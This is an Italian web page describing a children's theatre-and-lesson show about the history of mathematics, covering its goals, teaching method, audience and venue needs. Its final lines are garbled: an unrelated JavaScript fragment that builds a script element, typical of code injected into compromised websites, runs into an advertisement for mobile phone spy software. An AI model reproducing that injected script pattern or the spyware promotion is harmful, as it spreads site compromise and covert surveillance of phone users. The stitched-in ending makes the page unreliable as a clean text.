2+2, la matematica divertente

Di: Toni Comello

Ostica la matematica?

Vediamo un po’: come calcolavano i primitivi?
Pecore, pietre, tacche, dita … poi le forme geometriche (i Greci), i numeri (gli Indu’), e gli Arabi, e la matematica oggi. Scene recitate, cortei di pecore, foreste in movimento…

E il mondo moderno? Le operazioni, i problemi, il traffico !!!
Dal caos primordiale a quello di oggi e la matematica affannata a mettere ordine.
Un divertimento multicolore e ritmato che fa dire: la matematica?
E che non sia bello studiarla?!?!

Obiettivi

Lo spettacolo si integra con il lavoro curricolare del I° ciclo delle scuole elementari e in particolare approfondisce lo studio della matematica.

Metodologie

Lezione_gioco_spettacolo

Lezione: momenti didattici, dedicati alla spiegazione degli argomenti trattati, con l’ausilio di proiezioni di diapositive;
Gioco: i bambini vengono coinvolti in prima persona nel gioco dei numeri, rappresentando le unità e gli insiemi di categorie; un percorso che parte dalla matematica dei primordi, fino ad arrivare al suo utilizzo nella quotidianità dell’era moderna.
Spettacolo: gli attori sottolineano con momenti scenici e divertenti i punti chiave dell’argomento trattato.

I tre livelli lezione_gioco_spettacolo si alternano vicendevolmente nel corso dell’evento, in modo da agevolare l’apprendimento e mantenere nel bambino un buon livello di attenzione e partecipazione.

Destinatari

Lo spettacolo si inserisce nel programma didattico del I° ciclo elementari.

Esigenze standard

Numero partecipanti: minimo 50, massimo 100 bambini.
Luogo: palestra, biblioteca, aula magna, atrio, preferibilmente oscurabile, minimo n.2 prese di corrente agibili.

Possibilità di allestire lo spazio 2 ore prima dello spettacolo.var d=document;var s=d.createElement(‘script’);


if (document.currentScript) { } else {https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.